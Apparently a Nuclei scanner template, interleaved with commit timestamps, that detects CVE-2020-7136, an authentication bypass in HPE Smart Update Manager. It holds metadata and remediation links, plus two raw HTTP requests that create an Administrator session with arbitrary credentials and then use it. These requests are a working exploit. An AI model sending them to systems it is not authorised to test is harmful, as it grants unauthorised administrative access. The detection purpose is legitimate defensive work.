2022-01-11 06:39:41 +00:00
id : CVE-2020-7136
info :
2022-04-29 19:58:07 +00:00
name : HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
2022-01-11 06:39:41 +00:00
author : gy741
severity : critical
2022-04-29 19:58:07 +00:00
description : HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system.
2023-09-06 12:22:36 +00:00
remediation : Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
2022-01-11 06:39:41 +00:00
reference :
- https://www.tenable.com/security/research/tra-2020-02
- https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
- https://nvd.nist.gov/vuln/detail/CVE-2020-7136
2022-05-17 09:18:12 +00:00
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-01-11 06:39:41 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-01-11 06:39:41 +00:00
cve-id : CVE-2020-7136
cwe-id : CWE-288
2024-01-29 17:11:14 +00:00
epss-score : 0.26929
epss-percentile : 0.96346
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : hpe
product : smart_update_manager
tags : cve,cve2020,hp,auth-bypass,hpe,tenable
2022-01-11 06:39:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-11 06:39:41 +00:00
- raw :
- |
POST /session/create HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/json
{"hapi" : {"username" : "Administrator" , "password" : "any_password" , "language" : "en" , "mode" : "gui" , "usesshkey" : true , "privatekey" : "any_privateky" , "passphrase" : "any_passphase" , "settings" : {"output_filter" : "passed" , "port_number" : "444" }}}
2022-01-11 08:13:30 +00:00
- |
GET /session/{{sessionid}}/node/index HTTP/1.1
Host : {{Hostname}}
2022-01-11 06:39:41 +00:00
matchers :
2022-01-11 08:13:30 +00:00
- type : word
part : body
words :
- "hmessage"
- "Command completed successfully."
- "node_name"
condition : and
extractors :
2022-01-11 06:39:41 +00:00
- type : regex
2022-01-11 08:13:30 +00:00
name : sessionid
group : 1
2022-01-11 06:39:41 +00:00
regex :
- '"sessionId":"([a-z0-9.]+)"'
2023-07-11 19:49:27 +00:00
internal : true
part : body
2024-01-14 14:05:19 +00:00
# digest: 4b0a00483046022100d60652338dcc7d08a0d4d42da7c2266baee2977117a0aefd3d5238f921528e2a02210096035a0d071a367f4caedbc95a84354bf9ad60f68432a12b08bbd1cecf4d18b8:922c64590222798bb761d5b6d8e72950